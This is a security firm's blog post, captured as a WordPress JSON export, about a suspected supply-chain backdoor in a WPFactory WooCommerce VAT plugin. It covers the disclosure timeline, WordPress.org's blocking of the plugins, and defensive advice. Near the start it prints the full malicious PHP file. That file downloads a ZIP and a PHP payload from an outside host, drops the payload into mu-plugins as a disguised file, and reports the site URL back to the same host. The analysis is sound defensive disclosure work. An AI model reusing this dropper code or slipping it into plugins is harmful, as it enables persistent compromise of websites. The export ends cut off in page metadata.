{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/sk\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"Security attack on WPFactory: 170,000 WordPress websites at risk"},"content":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percent of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, this CMS has become the backbone of the modern web. Its popularity stems from its flexibility, its open ecosystem, and the vast number of plugins available to extend its functionality.<\/p>\n\n\n\n<p>However, this same ecosystem has also become one of WordPress's biggest security challenges.<\/p>\n\n\n\n<p>At Ferber Enterprises, our cybersecurity team continuously monitors threats affecting the WordPress ecosystem, because vulnerabilities in plugins, themes, or supply chains can quickly turn into large-scale attacks affecting thousands of websites worldwide. 
In recent years, attackers have increasingly targeted plugin developers and distribution infrastructure rather than individual websites, which allows malicious code to spread through trusted software updates and official download channels.<\/p>\n\n\n\n<p>This week, a major controversy erupted around WPFactory, a well-known WordPress plugin developer whose products are installed on more than 170,000 websites worldwide. More than 80 plugins associated with the company were temporarily blocked on WordPress.org after our cybersecurity team discovered a suspected backdoor at WPFactory, in the premium version of one of its plugins.<\/p>\n\n\n\n<p>The incident has raised serious concerns in the WordPress community about software supply-chain security, plugin review processes, and the growing sophistication of attacks targeting the open-source ecosystem.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Discovery of suspicious plugin behaviour<\/h2>\n\n\n\n<p>The issue first surfaced after our cybersecurity team at Ferber Enterprises noticed unusual behaviour while testing the premium version of the \u201cEU VAT for WooCommerce Pro\u201d plugin, which is available directly from the official website.<\/p>\n\n\n\n
<p>The initial investigation began after the plugin generated a critical error during installation. While troubleshooting the problem, our analysts identified a suspicious PHP file named class-alg-wc-eu-vat-customer.php. The file appeared to perform actions that were entirely inconsistent with the expected functionality of a WooCommerce VAT plugin.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 
'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . 
'\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>According to our analysis, the code attempted to:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Download an external ZIP archive from a remote server<\/li>\n\n\n\n<li>Modify WordPress core directories<\/li>\n\n\n\n<li>Communicate with external infrastructure<\/li>\n\n\n\n<li>Potentially execute remote payloads on affected websites<\/li>\n<\/ul>\n\n\n\n<p>These indicators immediately suggested the possible presence of a hidden backdoor or a malicious supply-chain compromise.<\/p>\n\n\n\n<p>What made the situation particularly concerning was that the plugin had not been obtained from an unofficial mirror or an illegal repository. 
The package was downloaded directly from WPFactory's official customer portal, which further reinforced concerns that the distribution channel itself might have been compromised.<\/p>\n\n\n\n<p>At Ferber Enterprises, we immediately documented the incident and began the responsible disclosure process by contacting WPFactory directly via GitHub.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">Initial response from WPFactory<\/h2><\/div>\n\n\n\n<p>WPFactory initially responded by stating that the suspicious file and the behaviour described in the report were not part of its official source code.<\/p>\n\n\n\n<p>A company representative suggested several alternative explanations, including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A modified local installation<\/li>\n\n\n\n<li>A compromised website environment<\/li>\n\n\n\n<li>An outdated plugin version<\/li>\n\n\n\n<li>A potentially altered download source<\/li>\n<\/ul>\n\n\n\n<p>The company also stated that it was unable to safely inspect the provided ZIP file because its browser flagged the archive as potentially dangerous.<\/p>\n\n\n\n<p>Our cybersecurity team then clarified that the plugin had been downloaded directly from the official WPFactory website and that the suspicious file remained present even after downloading a fresh copy of version 4.6.1 from the same source.<\/p>\n\n\n\n<p>This detail became key to the investigation. 
If multiple independent downloads from the official distribution channel consistently contained the same suspicious code, a compromise of the local website became increasingly unlikely. Despite these findings, WPFactory initially stated that it could not reproduce the issue on its side and maintained that the suspicious file did not exist in the official plugin package.<\/p>\n\n\n\n<p>The company subsequently requested administrator and FTP access to the affected environment in order to continue its investigation. At Ferber Enterprises, we declined this request for cybersecurity reasons. Granting privileged server access to a vendor whose own infrastructure might be compromised would have posed an unacceptable security risk. Instead, our team continued to provide technical evidence, including a video recording that captured the plugin's suspicious behaviour immediately after installation.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Escalation to WordPress.org<\/h2><\/div>\n\n\n\n<p>As the investigation progressed, concerns grew about the possible scale of the issue. WPFactory maintains an extensive plugin portfolio comprising more than 65 plugins with a combined total of over 170,000 active installations. 
Any compromise of the company's distribution infrastructure could therefore have far-reaching consequences across the WordPress ecosystem.<\/p>\n\n\n\n<p>Our team escalated the issue directly to WordPress.org in order to prevent further users from installing potentially compromised packages while the investigation was under way. WordPress.org subsequently took the extraordinary step of temporarily blocking more than 80 WPFactory plugins in the official repository.<\/p>\n\n\n\n<p>This step immediately drew the attention of the entire WordPress security community, because a mass plugin suspension on this scale is relatively rare and usually indicates serious unresolved problems. After the escalation, WPFactory later acknowledged that the issue appeared to be legitimate and apologised for not responding more quickly to the original report. Company representatives stated that they were actively investigating the matter and working to resolve it. One hypothesis raised internally by WPFactory suggested that an outdated or cached plugin package might have been served inadvertently through its infrastructure.<\/p>\n\n\n\n<p>However, our cybersecurity team disagreed with this assessment. 
The observed behaviour strongly suggested a deeper security problem, potentially involving compromised build pipelines, distribution systems, or unauthorised code injection into downloadable plugin archives.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Why this incident matters<\/h2>\n\n\n\n<p>The WPFactory controversy highlights a growing cybersecurity threat known as a software supply-chain attack. Traditionally, attackers focused on compromising individual websites directly through brute-force attacks or plugin vulnerabilities. Today, attackers increasingly target software vendors directly, because compromising a trusted vendor allows malicious code to spread to thousands of websites at once.<\/p>\n\n\n\n<p>This strategy has already been observed in several major cybersecurity incidents that affected global software ecosystems over the past decade. 
In the WordPress ecosystem specifically, plugin developers are attractive targets because plugins are inherently trusted by administrators and often run with extended permissions.<\/p>\n\n\n\n<p>If malicious code makes its way into a plugin package distributed through an official channel, affected websites may install malware themselves without realising it. In the case of the suspicious WPFactory plugin, the potential consequences are serious.<\/p>\n\n\n\n<p>Based on our analysis, the identified behaviour could theoretically allow attackers to:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Deploy additional malware<\/li>\n\n\n\n<li>Inject SEO spam<\/li>\n\n\n\n<li>Create persistent backdoors<\/li>\n\n\n\n<li>Exfiltrate sensitive data<\/li>\n\n\n\n<li>Modify WordPress installations remotely<\/li>\n\n\n\n<li>Maintain unauthorised access over long periods of time<\/li>\n<\/ul>\n\n\n\n<p>The danger of such attacks lies in their stealth. Modern backdoors are often designed to remain dormant for months before activation, which makes them considerably harder to detect. 
Earlier this month, the WordPress Plugins team reportedly closed more than 30 plugins after hidden malicious code embedded in another plugin portfolio remained dormant for approximately eight months before it finally activated and injected SEO spam into websites.<\/p>\n\n\n\n<p>This trend demonstrates how attackers increasingly favour persistence and delayed activation in order to evade detection mechanisms.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">A broader security crisis in the WordPress ecosystem<\/h2><\/div>\n\n\n\n<p>The WPFactory incident also points to broader systemic security problems affecting the entire WordPress landscape. The plugin ecosystem has grown significantly over the past decade, and tens of thousands of plugins are available on official and commercial marketplaces. Although this ecosystem fosters innovation and flexibility, it also makes security oversight considerably more difficult.<\/p>\n\n\n\n<p>According to Patchstack's report \u201cState of WordPress Security in 2026\u201d, almost 461 million known vulnerabilities had not been patched before they were disclosed. This statistic reflects the growing burden faced by plugin developers, security researchers, and repository maintainers.<\/p>\n\n\n\n<p>At the same time, the official WordPress plugin review queue reportedly exceeds 4,000 plugins awaiting review. 
Figures like these illustrate the enormous challenge of maintaining quality assurance and security auditing at scale.<\/p>\n\n\n\n<p>Many plugin developers are small teams with limited security resources. Others manage dozens of plugins at once while pursuing aggressive commercial growth strategies that include acquisitions and portfolio expansion. WPFactory itself recently grew through acquisitions, including the 2025 purchase of Extend-WP and its 19 plugins, followed later that year by the acquisition of WBW and several additional plugins.<\/p>\n\n\n\n<p>Rapid portfolio expansion can create operational complexity that complicates code auditing, infrastructure management, and release integrity verification. Attackers are fully aware of these realities. 
They increasingly focus on exploiting weak operational security practices at software vendors instead of targeting end users directly.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The growing importance of supply-chain security<\/h2>\n\n\n\n<p>Incidents like this one reinforce the urgent need for stronger supply-chain security practices across the WordPress ecosystem.<\/p>\n\n\n\n<p>At Ferber Enterprises, our cybersecurity team strongly recommends that plugin developers adopt several key security measures, including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Cryptographic package signing<\/li>\n\n\n\n<li>Secured CI\/CD pipelines<\/li>\n\n\n\n<li>Mandatory multi-factor authentication<\/li>\n\n\n\n<li>Infrastructure segmentation<\/li>\n\n\n\n<li>Continuous integrity monitoring<\/li>\n\n\n\n<li>Independent code audits<\/li>\n\n\n\n<li>Reproducible build systems<\/li>\n<\/ul>\n\n\n\n<p>Website administrators should also strengthen their own security measures. 
Even plugins downloaded from official or trusted sources should not be assumed to be safe.<\/p>\n\n\n\n<p>Organisations managing critical WordPress infrastructure should consider:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Maintaining staging environments<\/li>\n\n\n\n<li>Monitoring outbound traffic<\/li>\n\n\n\n<li>Scanning plugins before deployment<\/li>\n\n\n\n<li>Limiting plugin usage<\/li>\n\n\n\n<li>Enforcing least-privilege controls<\/li>\n\n\n\n<li>Implementing file integrity monitoring<\/li>\n\n\n\n<li>Using managed web application firewalls (WAF)<\/li>\n<\/ul>\n\n\n\n<p>In enterprise environments, supply-chain validation is becoming just as important as traditional vulnerability management. 
The assumption that official software channels are always safe is no longer realistic in today's threat landscape.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Community reaction and the ongoing investigation<\/h2>\n\n\n\n<p>The controversy spread quickly through the WordPress community after developers, security researchers, and infrastructure providers began discussing the issue publicly.<\/p>\n\n\n\n<p>Several well-known figures in the ecosystem raised awareness of the situation, including developers who published lists of the temporarily closed plugins and encouraged administrators to audit their environments.<\/p>\n\n\n\n<p>Meanwhile, our team at Ferber Enterprises continues to analyse suspicious plugin samples and to track further indicators of compromise that could affect WordPress websites worldwide.<\/p>\n\n\n\n<p>At the time of publication, WPFactory had confirmed the existence of the issue and stated that it was actively working to resolve it.<\/p>\n\n\n\n<p>However, many questions remain unanswered:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Was the official distribution infrastructure compromised?<\/li>\n\n\n\n<li>For how long were malicious packages potentially distributed?<\/li>\n\n\n\n<li>Were other plugins affected as well?<\/li>\n\n\n\n<li>Were customer accounts or download systems compromised?<\/li>\n\n\n\n<li>Did attackers gain persistent access to internal infrastructure?<\/li>\n\n\n\n<li>Could additional 
dormant payloads still exist?<\/li>\n<\/ul>\n\n\n\n<p>Until these questions are fully resolved, caution remains essential.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The future of WordPress security<\/h2>\n\n\n\n<p>The WPFactory incident may ultimately become another textbook example of the cybersecurity challenges facing the open-source software ecosystem on the web.<\/p>\n\n\n\n<p>WordPress powers a huge portion of the global internet economy. Any large-scale compromise affecting plugin developers can therefore have consequences that extend beyond individual websites.<\/p>\n\n\n\n<p>As attackers increasingly focus on supply-chain compromise and stealthy persistence techniques, plugin security can no longer be treated as a secondary concern. At Ferber Enterprises, we believe this event is an important reminder that cybersecurity is not only about protecting websites themselves, but also about securing every layer of the software distribution chain.<\/p>\n\n\n\n<p>Trust in open ecosystems depends on transparency, rapid incident response, and strong operational security practices. 
The WordPress ecosystem now faces an important moment.<\/p>\n\n\n\n<p>The way developers, repository maintainers, hosting providers, and security teams respond to incidents like this one will help determine whether WordPress can continue to retain the trust of the millions of businesses and organisations that rely on it every day.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percent of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center 
center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center 
center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeli
ne\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_uag_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-
below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center 
center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading 
.wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: 
